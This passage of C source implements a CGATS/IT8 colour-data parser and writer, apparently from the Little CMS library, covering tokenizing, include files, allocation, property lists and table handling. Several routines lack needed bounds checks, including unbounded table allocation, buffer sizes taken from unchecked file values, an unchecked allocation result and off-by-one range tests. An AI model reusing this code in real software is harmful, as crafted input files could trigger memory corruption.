}
it8->inum = it8->inum * 16 + j;
NextCh(it8);
}
return;
}
if (toupper(it8->ch) == 'B') { // Binary
int j;
NextCh(it8);
while (it8->ch == '0' || it8->ch == '1')
{
j = it8->ch - '0';
if ((cmsFloat64Number) it8->inum * 2.0 + j > (cmsFloat64Number)+2147483647.0)
{
SynError(it8, "Invalid binary number");
return;
}
it8->inum = it8->inum * 2 + j;
NextCh(it8);
}
return;
}
}
while (isdigit(it8->ch)) {
cmsInt32Number digit = (it8->ch - '0');
if ((cmsFloat64Number) it8->inum * 10.0 + (cmsFloat64Number) digit > (cmsFloat64Number) +2147483647.0) {
ReadReal(it8, it8->inum);
it8->sy = SDNUM;
it8->dnum *= sign;
return;
}
it8->inum = it8->inum * 10 + digit;
NextCh(it8);
}
if (it8->ch == '.') {
ReadReal(it8, it8->inum);
it8->sy = SDNUM;
it8->dnum *= sign;
return;
}
it8 -> inum *= sign;
// Special case. Numbers followed by letters are taken as identifiers
if (isidchar(it8 ->ch)) {
if (it8 ->sy == SINUM) {
snprintf(it8->id, 127, "%d", it8->inum);
}
else {
snprintf(it8->id, 127, it8 ->DoubleFormatter, it8->dnum);
}
k = (int) strlen(it8 ->id);
idptr = it8 ->id + k;
do {
if (++k < MAXID) *idptr++ = (char) it8->ch;
NextCh(it8);
} while (isidchar(it8->ch));
*idptr = '\0';
it8->sy = SIDENT;
}
return;
}
else
switch ((int) it8->ch) {
// EOF marker -- ignore it
case '\x1a':
NextCh(it8);
break;
// Eof stream markers
case 0:
case -1:
it8->sy = SEOF;
break;
// Next line
case '\r':
NextCh(it8);
if (it8 ->ch == '\n')
NextCh(it8);
it8->sy = SEOLN;
it8->lineno++;
break;
case '\n':
NextCh(it8);
it8->sy = SEOLN;
it8->lineno++;
break;
// Comment
case '#':
NextCh(it8);
while (it8->ch && it8->ch != '\n' && it8->ch != '\r')
NextCh(it8);
it8->sy = SCOMMENT;
break;
// String.
case '\'':
case '\"':
idptr = it8->str;
sng = it8->ch;
k = 0;
NextCh(it8);
while (k < (MAXSTR-1) && it8->ch != sng) {
if (it8->ch == '\n'|| it8->ch == '\r') k = MAXSTR+1;
else {
*idptr++ = (char) it8->ch;
NextCh(it8);
k++;
}
}
it8->sy = SSTRING;
*idptr = '\0';
NextCh(it8);
break;
default:
SynError(it8, "Unrecognized character: 0x%x", it8 ->ch);
return;
}
} while (it8->sy == SCOMMENT);
// Handle the include special token
if (it8 -> sy == SINCLUDE) {
FILECTX* FileNest;
if(it8 -> IncludeSP >= (MAXINCLUDE-1)) {
SynError(it8, "Too many recursion levels");
return;
}
InSymbol(it8);
if (!Check(it8, SSTRING, "Filename expected")) return;
FileNest = it8 -> FileStack[it8 -> IncludeSP + 1];
if(FileNest == NULL) {
FileNest = it8 ->FileStack[it8 -> IncludeSP + 1] = (FILECTX*)AllocChunk(it8, sizeof(FILECTX));
//if(FileNest == NULL)
// TODO: how to manage out-of-memory conditions?
}
if (BuildAbsolutePath(it8->str,
it8->FileStack[it8->IncludeSP]->FileName,
FileNest->FileName, cmsMAX_PATH-1) == FALSE) {
SynError(it8, "File path too long");
return;
}
FileNest->Stream = fopen(FileNest->FileName, "rt");
if (FileNest->Stream == NULL) {
SynError(it8, "File %s not found", FileNest->FileName);
return;
}
it8->IncludeSP++;
it8 ->ch = ' ';
InSymbol(it8);
}
}
// Checks end of line separator
static
cmsBool CheckEOLN(cmsIT8* it8)
{
if (!Check(it8, SEOLN, "Expected separator")) return FALSE;
while (it8 -> sy == SEOLN)
InSymbol(it8);
return TRUE;
}
// Skip a symbol
static
void Skip(cmsIT8* it8, SYMBOL sy)
{
if (it8->sy == sy && it8->sy != SEOF)
InSymbol(it8);
}
// Skip multiple EOLN
static
void SkipEOLN(cmsIT8* it8)
{
while (it8->sy == SEOLN) {
InSymbol(it8);
}
}
// Returns a string holding current value
static
cmsBool GetVal(cmsIT8* it8, char* Buffer, cmsUInt32Number max, const char* ErrorTitle)
{
switch (it8->sy) {
case SEOLN: // Empty value
Buffer[0]=0;
break;
case SIDENT: strncpy(Buffer, it8->id, max);
Buffer[max-1]=0;
break;
case SINUM: snprintf(Buffer, max, "%d", it8 -> inum); break;
case SDNUM: snprintf(Buffer, max, it8->DoubleFormatter, it8 -> dnum); break;
case SSTRING: strncpy(Buffer, it8->str, max);
Buffer[max-1] = 0;
break;
default:
return SynError(it8, "%s", ErrorTitle);
}
Buffer[max] = 0;
return TRUE;
}
// ---------------------------------------------------------- Table
static
TABLE* GetTable(cmsIT8* it8)
{
if ((it8 -> nTable >= it8 ->TablesCount)) {
SynError(it8, "Table %d out of sequence", it8 -> nTable);
return it8 -> Tab;
}
return it8 ->Tab + it8 ->nTable;
}
// ---------------------------------------------------------- Memory management
// Frees an allocator and owned memory
void CMSEXPORT cmsIT8Free(cmsHANDLE hIT8)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
if (it8 == NULL)
return;
if (it8->MemorySink) {
OWNEDMEM* p;
OWNEDMEM* n;
for (p = it8->MemorySink; p != NULL; p = n) {
n = p->Next;
if (p->Ptr) _cmsFree(it8 ->ContextID, p->Ptr);
_cmsFree(it8 ->ContextID, p);
}
}
if (it8->MemoryBlock)
_cmsFree(it8 ->ContextID, it8->MemoryBlock);
_cmsFree(it8 ->ContextID, it8);
}
// Allocates a chunk of data, keep linked list
static
void* AllocBigBlock(cmsIT8* it8, cmsUInt32Number size)
{
OWNEDMEM* ptr1;
void* ptr = _cmsMallocZero(it8->ContextID, size);
if (ptr != NULL) {
ptr1 = (OWNEDMEM*) _cmsMallocZero(it8 ->ContextID, sizeof(OWNEDMEM));
if (ptr1 == NULL) {
_cmsFree(it8 ->ContextID, ptr);
return NULL;
}
ptr1-> Ptr = ptr;
ptr1-> Next = it8 -> MemorySink;
it8 -> MemorySink = ptr1;
}
return ptr;
}
// Suballocator.
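// Carves small allocations out of progressively larger blocks (20K to start, doubling
// afterwards); individual chunks are never freed until the whole cmsIT8 is destroyed.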
static
void* AllocChunk(cmsIT8* it8, cmsUInt32Number size)
{
cmsUInt32Number Free = it8 ->Allocator.BlockSize - it8 ->Allocator.Used;
cmsUInt8Number* ptr;
size = _cmsALIGNMEM(size);
if (size > Free) {
if (it8 -> Allocator.BlockSize == 0)
it8 -> Allocator.BlockSize = 20*1024;
else
it8 ->Allocator.BlockSize *= 2;
if (it8 ->Allocator.BlockSize < size)
it8 ->Allocator.BlockSize = size;
it8 ->Allocator.Used = 0;
it8 ->Allocator.Block = (cmsUInt8Number*) AllocBigBlock(it8, it8 ->Allocator.BlockSize);
}
ptr = it8 ->Allocator.Block + it8 ->Allocator.Used;
it8 ->Allocator.Used += size;
return (void*) ptr;
}
// Allocates a string
static
char *AllocString(cmsIT8* it8, const char* str)
{
cmsUInt32Number Size = (cmsUInt32Number) strlen(str)+1;
char *ptr;
ptr = (char *) AllocChunk(it8, Size);
if (ptr) strncpy (ptr, str, Size-1);
return ptr;
}
// Searches through linked list
static
cmsBool IsAvailableOnList(KEYVALUE* p, const char* Key, const char* Subkey, KEYVALUE** LastPtr)
{
if (LastPtr) *LastPtr = p;
for (; p != NULL; p = p->Next) {
if (LastPtr) *LastPtr = p;
if (*Key != '#') { // Comments are ignored
if (cmsstrcasecmp(Key, p->Keyword) == 0)
break;
}
}
if (p == NULL)
return FALSE;
if (Subkey == 0)
return TRUE;
for (; p != NULL; p = p->NextSubkey) {
if (p ->Subkey == NULL) continue;
if (LastPtr) *LastPtr = p;
if (cmsstrcasecmp(Subkey, p->Subkey) == 0)
return TRUE;
}
return FALSE;
}
// Add a property into a linked list
static
KEYVALUE* AddToList(cmsIT8* it8, KEYVALUE** Head, const char *Key, const char *Subkey, const char* xValue, WRITEMODE WriteAs)
{
KEYVALUE* p;
KEYVALUE* last;
// Check if property is already in list
if (IsAvailableOnList(*Head, Key, Subkey, &p)) {
// This may work for editing properties
// return SynError(it8, "duplicate key <%s>", Key);
}
else {
last = p;
// Allocate the container
p = (KEYVALUE*) AllocChunk(it8, sizeof(KEYVALUE));
if (p == NULL)
{
SynError(it8, "AddToList: out of memory");
return NULL;
}
// Store name and value
p->Keyword = AllocString(it8, Key);
p->Subkey = (Subkey == NULL) ? NULL : AllocString(it8, Subkey);
// Keep the container in our list
if (*Head == NULL) {
*Head = p;
}
else
{
if (Subkey != NULL && last != NULL) {
last->NextSubkey = p;
// If Subkey is not null, then last is the last property with the same key,
// but is not necessarily the last property in the list, so we need to move
// to the actual list end
while (last->Next != NULL)
last = last->Next;
}
if (last != NULL) last->Next = p;
}
p->Next = NULL;
p->NextSubkey = NULL;
}
p->WriteAs = WriteAs;
if (xValue != NULL) {
p->Value = AllocString(it8, xValue);
}
else {
p->Value = NULL;
}
return p;
}
static
KEYVALUE* AddAvailableProperty(cmsIT8* it8, const char* Key, WRITEMODE as)
{
return AddToList(it8, &it8->ValidKeywords, Key, NULL, NULL, as);
}
static
KEYVALUE* AddAvailableSampleID(cmsIT8* it8, const char* Key)
{
return AddToList(it8, &it8->ValidSampleID, Key, NULL, NULL, WRITE_UNCOOKED);
}
static
void AllocTable(cmsIT8* it8)
{
TABLE* t;
t = it8 ->Tab + it8 ->TablesCount;
t->HeaderList = NULL;
t->DataFormat = NULL;
t->Data = NULL;
it8 ->TablesCount++;
}
cmsInt32Number CMSEXPORT cmsIT8SetTable(cmsHANDLE IT8, cmsUInt32Number nTable)
{
cmsIT8* it8 = (cmsIT8*) IT8;
if (nTable >= it8 ->TablesCount) {
if (nTable == it8 ->TablesCount) {
AllocTable(it8);
}
else {
SynError(it8, "Table %d is out of sequence", nTable);
return -1;
}
}
it8 ->nTable = nTable;
return (cmsInt32Number) nTable;
}
// Init an empty container
cmsHANDLE CMSEXPORT cmsIT8Alloc(cmsContext ContextID)
{
cmsIT8* it8;
cmsUInt32Number i;
it8 = (cmsIT8*) _cmsMallocZero(ContextID, sizeof(cmsIT8));
if (it8 == NULL) return NULL;
AllocTable(it8);
it8->MemoryBlock = NULL;
it8->MemorySink = NULL;
it8 ->nTable = 0;
it8->ContextID = ContextID;
it8->Allocator.Used = 0;
it8->Allocator.Block = NULL;
it8->Allocator.BlockSize = 0;
it8->ValidKeywords = NULL;
it8->ValidSampleID = NULL;
it8 -> sy = SUNDEFINED;
it8 -> ch = ' ';
it8 -> Source = NULL;
it8 -> inum = 0;
it8 -> dnum = 0.0;
it8->FileStack[0] = (FILECTX*)AllocChunk(it8, sizeof(FILECTX));
it8->IncludeSP = 0;
it8 -> lineno = 1;
strcpy(it8->DoubleFormatter, DEFAULT_DBL_FORMAT);
cmsIT8SetSheetType((cmsHANDLE) it8, "CGATS.17");
// Initialize predefined properties & data
for (i=0; i < NUMPREDEFINEDPROPS; i++)
AddAvailableProperty(it8, PredefinedProperties[i].id, PredefinedProperties[i].as);
for (i=0; i < NUMPREDEFINEDSAMPLEID; i++)
AddAvailableSampleID(it8, PredefinedSampleID[i]);
return (cmsHANDLE) it8;
}
const char* CMSEXPORT cmsIT8GetSheetType(cmsHANDLE hIT8)
{
return GetTable((cmsIT8*) hIT8)->SheetType;
}
cmsBool CMSEXPORT cmsIT8SetSheetType(cmsHANDLE hIT8, const char* Type)
{
TABLE* t = GetTable((cmsIT8*) hIT8);
strncpy(t ->SheetType, Type, MAXSTR-1);
t ->SheetType[MAXSTR-1] = 0;
return TRUE;
}
cmsBool CMSEXPORT cmsIT8SetComment(cmsHANDLE hIT8, const char* Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
if (!Val) return FALSE;
if (!*Val) return FALSE;
return AddToList(it8, &GetTable(it8)->HeaderList, "# ", NULL, Val, WRITE_UNCOOKED) != NULL;
}
// Sets a property
cmsBool CMSEXPORT cmsIT8SetPropertyStr(cmsHANDLE hIT8, const char* Key, const char *Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
if (!Val) return FALSE;
if (!*Val) return FALSE;
return AddToList(it8, &GetTable(it8)->HeaderList, Key, NULL, Val, WRITE_STRINGIFY) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyDbl(cmsHANDLE hIT8, const char* cProp, cmsFloat64Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buffer[1024];
snprintf(Buffer, 1023, it8->DoubleFormatter, Val);
return AddToList(it8, &GetTable(it8)->HeaderList, cProp, NULL, Buffer, WRITE_UNCOOKED) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyHex(cmsHANDLE hIT8, const char* cProp, cmsUInt32Number Val)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
char Buffer[1024];
snprintf(Buffer, 1023, "%u", Val);
return AddToList(it8, &GetTable(it8)->HeaderList, cProp, NULL, Buffer, WRITE_HEXADECIMAL) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyUncooked(cmsHANDLE hIT8, const char* Key, const char* Buffer)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
return AddToList(it8, &GetTable(it8)->HeaderList, Key, NULL, Buffer, WRITE_UNCOOKED) != NULL;
}
cmsBool CMSEXPORT cmsIT8SetPropertyMulti(cmsHANDLE hIT8, const char* Key, const char* SubKey, const char *Buffer)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
return AddToList(it8, &GetTable(it8)->HeaderList, Key, SubKey, Buffer, WRITE_PAIR) != NULL;
}
// Gets a property
const char* CMSEXPORT cmsIT8GetProperty(cmsHANDLE hIT8, const char* Key)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE* p;
if (IsAvailableOnList(GetTable(it8) -> HeaderList, Key, NULL, &p))
{
return p -> Value;
}
return NULL;
}
cmsFloat64Number CMSEXPORT cmsIT8GetPropertyDbl(cmsHANDLE hIT8, const char* cProp)
{
const char *v = cmsIT8GetProperty(hIT8, cProp);
if (v == NULL) return 0.0;
return ParseFloatNumber(v);
}
const char* CMSEXPORT cmsIT8GetPropertyMulti(cmsHANDLE hIT8, const char* Key, const char *SubKey)
{
cmsIT8* it8 = (cmsIT8*) hIT8;
KEYVALUE* p;
if (IsAvailableOnList(GetTable(it8) -> HeaderList, Key, SubKey, &p)) {
return p -> Value;
}
return NULL;
}
// ----------------------------------------------------------------- Datasets
static
void AllocateDataFormat(cmsIT8* it8)
{
TABLE* t = GetTable(it8);
if (t -> DataFormat) return; // Already allocated
t -> nSamples = (int) cmsIT8GetPropertyDbl(it8, "NUMBER_OF_FIELDS");
if (t -> nSamples <= 0) {
SynError(it8, "AllocateDataFormat: Unknown NUMBER_OF_FIELDS");
t -> nSamples = 10;
}
t -> DataFormat = (char**) AllocChunk (it8, ((cmsUInt32Number) t->nSamples + 1) * sizeof(char *));
if (t->DataFormat == NULL) {
SynError(it8, "AllocateDataFormat: Unable to allocate dataFormat array");
}
}
static
const char *GetDataFormat(cmsIT8* it8, int n)
{
TABLE* t = GetTable(it8);
if (t->DataFormat)
return t->DataFormat[n];
return NULL;
}
static
cmsBool SetDataFormat(cmsIT8* it8, int n, const char *label)
{
TABLE* t = GetTable(it8);
if (!t->DataFormat)
AllocateDataFormat(it8);
if (n > t -> nSamples) {
SynError(it8, "More than NUMBER_OF_FIELDS fields.");
return FALSE;
}
if (t->DataFormat) {
t->DataFormat[n] = AllocString(it8, label);
}
return TRUE;
}
cmsBool CMSEXPORT cmsIT8SetDataFormat(cmsHANDLE h, int n, const char *Sample)
{
cmsIT8* it8 = (cmsIT8*)h;
return SetDataFormat(it8, n, Sample);
}
static
void AllocateDataSet(cmsIT8* it8)
{
TABLE* t = GetTable(it8);
if (t -> Data) return; // Already allocated
t-> nSamples = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_FIELDS"));
t-> nPatches = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_SETS"));
t-> Data = (char**)AllocChunk (it8, ((cmsUInt32Number) t->nSamples + 1) * ((cmsUInt32Number) t->nPatches + 1) *sizeof (char*));
if (t->Data == NULL) {
SynError(it8, "AllocateDataSet: Unable to allocate data array");
}
}
static
char* GetData(cmsIT8* it8, int nSet, int nField)
{
TABLE* t = GetTable(it8);
int nSamples = t -> nSamples;
int nPatches = t -> nPatches;
if (nSet >= nPatches || nField >= nSamples)
return NULL;
if (!t->Data) return NULL;
return t->Data [nSet * nSamples + nField];
}
static
cmsBool SetData(cmsIT8* it8, int nSet, int nField, const char *Val)
{
TABLE* t = GetTable(it8);
if (!t->Data)
AllocateDataSet(it8);
if (!t->Data) return FALSE;
if (nSet > t -> nPatches || nSet < 0) {
return SynError(it8, "Patch %d out of range, there are %d patches", nSet, t -> nPatches);
}
if (nField > t ->nSamples || nField < 0) {
return SynError(it8, "Sample %d out of range, there are %d samples", nField, t ->nSamples);
}
t->Data [nSet * t -> nSamples + nField] = AllocString(it8, Val);
return TRUE;
}
// --------------------------------------------------------------- File I/O
// Writes a string to file
static
void WriteStr(SAVESTREAM* f, const char *str)
{
cmsUInt32Number len;
if (str == NULL)
str = " ";
// Length to write
len = (cmsUInt32Number) strlen(str);
f ->Used += len;
if (f ->stream) { // Should I write it to a file?
if (fwrite(str, 1, len, f->stream) != len) {
cmsSignalError(0, cmsERROR_WRITE, "Write to file error in CGATS parser");
return;
}
}
else { // Or to a memory block?
if (f ->Base) { // Am I just counting the bytes?
if (f ->Used > f ->Max) {
cmsSignalError(0, cmsERROR_WRITE, "Write to memory overflows in CGATS parser");
return;
}
memmove(f ->Ptr, str, len);
f->Ptr += len;
}
}
}
// Write formatted
static
void Writef(SAVESTREAM* f, const char* frm, ...)
{
char Buffer[4096];
va_list args;
va_start(args, frm);
vsnprintf(Buffer, 4095, frm, args);
Buffer[4095] = 0;
WriteStr(f, Buffer);
va_end(args);
}
// Writes full header
static
void WriteHeader(cmsIT8* it8, SAVESTREAM* fp)
{
KEYVALUE* p;
TABLE* t = GetTable(it8);
// Writes the type
WriteStr(fp, t->SheetType);
WriteStr(fp, "\n");
for (p = t->HeaderList; (p != NULL); p = p->Next)
{
if (*p ->Keyword == '#') {
char* Pt;
WriteStr(fp, "#\n# ");
for (Pt = p ->Value; *Pt; Pt++) {
Writef(fp, "%c", *Pt);
if (*Pt == '\n') {
WriteStr(fp, "# ");
}
}
WriteStr(fp, "\n#\n");
continue;
}
if (!IsAvailableOnList(it8-> ValidKeywords, p->Keyword, NULL, NULL)) {
#ifdef CMS_STRICT_CGATS
WriteStr(fp, "KEYWORD\t\"");
WriteStr(fp, p->Keyword);
WriteStr(fp, "\"\n");
#endif
AddAvailableProperty(it8, p->Keyword, WRITE_UNCOOKED);
}
WriteStr(fp, p->Keyword);
if (p->Value) {
switch (p ->WriteAs) {
case WRITE_UNCOOKED:
Writef(fp, "\t%s", p ->Value);
break;
case WRITE_STRINGIFY:
Writef(fp, "\t\"%s\"", p->Value );
break;
case WRITE_HEXADECIMAL:
Writef(fp, "\t0x%X", atoi(p ->Value));
break;
case WRITE_BINARY:
Writef(fp, "\t0x%B", atoi(p ->Value));
break;
case WRITE_PAIR:
Writef(fp, "\t\"%s,%s\"", p->Subkey, p->Value);
break;
default: SynError(it8, "Unknown write mode %d", p ->WriteAs);
return;
}
}
WriteStr (fp, "\n");
}
}
// Writes the data format
static
void WriteDataFormat(SAVESTREAM* fp, cmsIT8* it8)
{
int i, nSamples;
TABLE* t = GetTable(it8);
if (!t -> DataFormat) return;
WriteStr(fp, "BEGIN_DATA_FORMAT\n");
WriteStr(fp, " ");
nSamples = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_FIELDS"));
for (i = 0; i < nSamples; i++) {
WriteStr(fp, t->DataFormat[i]);
WriteStr(fp, ((i == (nSamples-1)) ? "\n" : "\t"));
}
WriteStr (fp, "END_DATA_FORMAT\n");
}
// Writes data array
static
void WriteData(SAVESTREAM* fp, cmsIT8* it8)
{
int i, j;
TABLE* t = GetTable(it8);
if (!t->Data) return;
WriteStr (fp, "BEGIN_DATA\n");
t->nPatches = atoi(cmsIT8GetProperty(it8, "NUMBER_OF_SETS"));
for (i = 0; i < t-> nPatches; i++) {
WriteStr(fp, " ");
for (j = 0; j < t->nSamples; j++) {
char *ptr = t->Data[i*t->nSamples+j];
if (ptr == NULL) WriteStr(fp, "\"\"");
else {
// If value contains whitespace, enclose within quote
if (strchr(ptr, ' ') != NULL) {
WriteStr(fp, "\"");
WriteStr(fp, ptr);
WriteStr(fp, "\"");
}
else
WriteStr(fp, ptr);
}
WriteStr(fp, ((j == (t->nSamples-1)) ? "\n" : "\t"));
}
}
WriteStr (fp, "END_DATA\n");
}
// Saves whole file
cmsBool CMSEXPORT cmsIT8SaveToFile(cmsHANDLE hIT8, const char* cFileName)
{
SAVESTREAM sd;
cmsUInt32Number i;
cmsIT8* it8 = (cmsIT8*) hIT8;
memset(&sd, 0, sizeof(sd));
sd.stream = fopen(cFileName, "wt");
if (!sd.stream) return FALSE;
for (i=0; i < it8 ->TablesCount; i++) {
cmsIT8SetTable(hIT8, i);
WriteHeader(it8, &sd);
WriteDataFormat(&sd, it8);
WriteData(&sd, it8);
}
if (fclose(sd.stream) != 0) return FALSE;
return TRUE;
}
// Saves to memory
cmsBool CMSEXPORT cmsIT8SaveToMem(cmsHANDLE hIT8, void *MemPtr, cmsUInt32Number* BytesNeeded)
{
SAVESTREAM sd;
cmsUInt32Number i;
cmsIT8* it8 = (cmsIT8*) hIT8;
memset(&sd, 0, sizeof(sd));
sd.stream = NULL;
sd.Base = (cmsUInt8Number*) MemPtr;
sd.Ptr = sd.Base;
sd.Used = 0;
if (sd.Base)
sd.Max = *BytesNeeded; // Write to memory?
else
sd.Max = 0; // Just counting the needed bytes
for (i=0; i < it8 ->TablesCount; i++) {
cmsIT8SetTable(hIT8, i);
WriteHeader(it8, &sd);
WriteDataFormat(&sd, it8);
WriteData(&sd, it8);
}
sd.Used++; // The \0 at the very end
if (sd.Base)
*sd.Ptr = 0;
*BytesNeeded = sd.Used;
return TRUE;
}
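// Typical usage (illustrative): call cmsIT8SaveToMem() with MemPtr == NULL to learn
// BytesNeeded, allocate that many bytes, then call it again to fill the block.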
// -------------------------------------------------------------- Higher level parsing
static
cmsBool DataFormatSection(cmsIT8* it8)
{
int iField = 0;
TABLE* t = GetTable(it8);
InSymbol(it8); // Eats "BEGIN_DATA_FORMAT"
CheckEOLN(it8);
while (it8->sy != SEND_DATA_FORMAT &&
it8->sy != SEOLN &&
it8->sy != SEOF &&
it8->sy != SSYNERROR) {
if (it8->sy != SIDENT) {
return SynError(it8, "Sample type expected");
}
if (!SetDataFormat(it8, iField, it8->id)) return FALSE;
iField++;
InSymbol(it8);
SkipEOLN(it8);
}
SkipEOLN(it8);
Skip(it8, SEND_DATA_FORMAT);
SkipEOLN(it8);
if (iField != t ->nSamples) {
SynError(it8, "Count mismatch. NUMBER_OF_FIELDS was %d, found %d\n", t ->nSamples, iField);
}
return TRUE;
}
static
cmsBool DataSection (cmsIT8* it8)
{
int iField = 0;
int iSet = 0;
char Buffer[256];
TABLE* t = GetTable(it8);
InSymbol(it8); // Eats "BEGIN_DATA"
CheckEOLN(it8);
if (!t->Data)
AllocateDataSet(it8);
while (it8->sy != SEND_DATA && it8->sy != SEOF)
{
if (iField >= t -> nSamples) {
iField = 0;
iSet++;
}
if (it8->sy != SEND_DATA && it8->sy != SEOF) {
if (!GetVal(it8, Buffer, 255, "Sample data expected"))
return FALSE;
if (!SetData(it8, iSet, iField, Buffer))
return FALSE;
iField++;
InSymbol(it8);
SkipEOLN(it8);
}
}
SkipEOLN(it8);
Skip(it8, SEND_DATA);
SkipEOLN(it8);
// Check for data completion.
if ((iSet+1) != t -> nPatches)
return SynError(it8, "Count mismatch. NUMBER_OF_SETS was %d, found %d\n", t ->nPatches, iSet+1);
return TRUE;
}
static
cmsBool HeaderSection(cmsIT8* it8)
{
char VarName[MAXID];
char Buffer[MAXSTR];
KEYVALUE* Key;
while (it8->sy != SEOF &&
it8->sy != SSYNERROR &&
it8->sy != SBEGIN_DATA_FORMAT &&
it8->sy != SBEGIN_DATA) {
switch (it8 -> sy) {
case SKEYWORD:
InSymbol(it8);
if (!GetVal(it8, Buffer, MAXSTR-1, "Keyword expected")) return FALSE;
if (!AddAvailableProperty(it8, Buffer, WRITE_UNCOOKED)) return FALSE;
InSymbol(it8);
break;
case SDATA_FORMAT_ID:
InSymbol(it8);
if (!GetVal(it8, Buffer, MAXSTR-1, "Keyword expected")) return FALSE;
if (!AddAvailableSampleID(it8, Buffer)) return FALSE;
InSymbol(it8);
break;
case SIDENT:
strncpy(VarName, it8->id, MAXID - 1);
VarName[MAXID - 1] = 0;
if (!IsAvailableOnList(it8->ValidKeywords, VarName, NULL, &Key)) {
#ifdef CMS_STRICT_CGATS
return SynError(it8, "Undefined keyword '%s'", VarName);
#else
Key = AddAvailableProperty(it8, VarName, WRITE_UNCOOKED);
if (Key == NULL) return FALSE;
#endif
}
InSymbol(it8);
if (!GetVal(it8, Buffer, MAXSTR - 1, "Property data expected")) return FALSE;
if (Key->WriteAs != WRITE_PAIR) {
AddToList(it8, &GetTable(it8)->HeaderList, VarName, NULL, Buffer,
(it8->sy == SSTRING) ? WRITE_STRINGIFY : WRITE_UNCOOKED);
}
else {
const char *Subkey;
char *Nextkey;
if (it8->sy != SSTRING)
return SynError(it8, "Invalid value '%s' for property '%s'.", Buffer, VarName);
// chop the string as a list of "subkey, value" pairs, using ';' as a separator
for (Subkey = Buffer; Subkey != NULL; Subkey = Nextkey)
{
char *Value, *temp;
// identify token pair boundary
Nextkey = (char*)strchr(Subkey, ';');
if (Nextkey)
*Nextkey++ = '\0';
// for each pair, split the subkey and the value
Value = (char*)strrchr(Subkey, ',');
if (Value == NULL)
return SynError(it8, "Invalid value for property '%s'.", VarName);
// gobble the spaces before the comma, and the comma itself
temp = Value++;
do *temp-- = '\0'; while (temp >= Subkey && *temp == ' ');
// gobble any space at the right
temp = Value + strlen(Value) - 1;
while (*temp == ' ') *temp-- = '\0';
// trim the strings from the left
Subkey += strspn(Subkey, " ");
Value += strspn(Value, " ");
if (Subkey[0] == 0 || Value[0] == 0)
return SynError(it8, "Invalid value for property '%s'.", VarName);
AddToList(it8, &GetTable(it8)->HeaderList, VarName, Subkey, Value, WRITE_PAIR);
}
}
InSymbol(it8);
break;
case SEOLN: break;
default:
return SynError(it8, "expected keyword or identifier");
}
SkipEOLN(it8);
}
return TRUE;
}
static
void ReadType(cmsIT8* it8, char* SheetTypePtr)
{
cmsInt32Number cnt = 0;
// First line is a very special case.
while (isseparator(it8->ch))
NextCh(it8);
while (it8->ch != '\r' && it8 ->ch != '\n' && it8->ch != '\t' && it8 -> ch != 0) {
if (cnt++ < MAXSTR)
*SheetTypePtr++= (char) it8 ->ch;
NextCh(it8);
}
*SheetTypePtr = 0;
}
static
cmsBool ParseIT8(cmsIT8* it8, cmsBool nosheet)
{
char* SheetTypePtr = it8 ->Tab[0].SheetType;
if (nosheet == 0) {
ReadType(it8, SheetTypePtr);
}
InSymbol(it8);
SkipEOLN(it8);
while (it8-> sy != SEOF &&
it8-> sy != SSYNERROR) {
switch (it8 -> sy) {
case SBEGIN_DATA_FORMAT:
if (!DataFormatSection(it8)) return FALSE;
break;
case SBEGIN_DATA:
if (!DataSection(it8)) return FALSE;
if (it8 -> sy != SEOF) {
AllocTable(it8);
it8 ->nTable = it8 ->TablesCount - 1;
// Read sheet type if present. We only support identifier and string.
// <ident> <eoln> is a type string
// anything else, is not a type string
if (nosheet == 0) {
if (it8 ->sy == SIDENT) {
// May be a type sheet or may be a prop value statement. We cannot use insymbol in
// this special case...
while (isseparator(it8->ch))
NextCh(it8);
// If a newline is found, then this is a type string
if (it8 ->ch == '\n' || it8->ch == '\r') {
cmsIT8SetSheetType(it8, it8 ->id);
InSymbol(it8);
}
else
{
// It is not. Just continue
cmsIT8SetSheetType(it8, "");
}
}
else
// Validate quoted strings
if (it8 ->sy == SSTRING) {
cmsIT8SetSheetType(it8, it8 ->str);
InSymbol(it8);
}
}
}
break;
case SEOLN:
SkipEOLN(it8);
break;
default:
if (!HeaderSection(it8)) return FALSE;
}
}
return (it8 -> sy != SSYNERROR);
}
// Init useful pointers
static
void CookPointers(cmsIT8* it8)
{
int idField, i;
char* Fld;
cmsUInt32Number j;
cmsUInt32Number nOldTable = it8 ->nTable;
for (j=0; j < it8 ->TablesCount; j++) {
TABLE* t = it8 ->Tab + j;
t -> SampleID = 0;
it8 ->nTable = j;
for (idField = 0; idField < t -> nSamples; idField++)
{
if (t ->DataFormat == NULL){
SynError(it8, "Undefined DATA_FORMAT");
return;
}
Fld = t->DataFormat[idField];
if (!Fld) continue;
if (cmsstrcasecmp(Fld, "SAMPLE_ID") == 0) {
t -> SampleID = idField;
for (i=0; i < t -> nPatches; i++) {
char *Data = GetData(it8, i, idField);
if (Data) {
char Buffer[256];
strncpy(Buffer, Data, 255);
Buffer[255] = 0;
if (strlen(Buffer) <= strlen(Data))
strcpy(Data, Buffer);
else
SetData(it8, i, idField, Buffer);
}
}
}
// "LABEL" is an extension. It keeps references to forward tables
if ((cmsstrcasecmp(Fld, "LABEL") == 0) || Fld[0] == '$' ) {
// Search for table references...
for (i=0; i < t -> nPatches; i++) {
char *Label = GetData(it8, i, idField);
if (Label) {
cmsUInt32Number k;
// This is the label, search for a table containing
// this property
for (k=0; k < it8 ->TablesCount; k++) {
TABLE* Table = it8 ->Tab + k;
KEYVALUE* p;
if (IsAvailableOnList(Table->HeaderList, Label, NULL, &p)) {
// Available, keep type and table
char Buffer[256];
char *Type = p ->Value;
int nTable = (int) k;
snprintf(Buffer, 255, "%s %d %s", Label, nTable, Type );
SetData(it8, i, idField, Buffer);
}
}
}
}
}
}
}
it8 ->nTable = nOldTable;
}
// Try to infer if the file is a CGATS/IT8 file at all. Reads the first line,
// which should be a run of printable characters terminated by a newline.
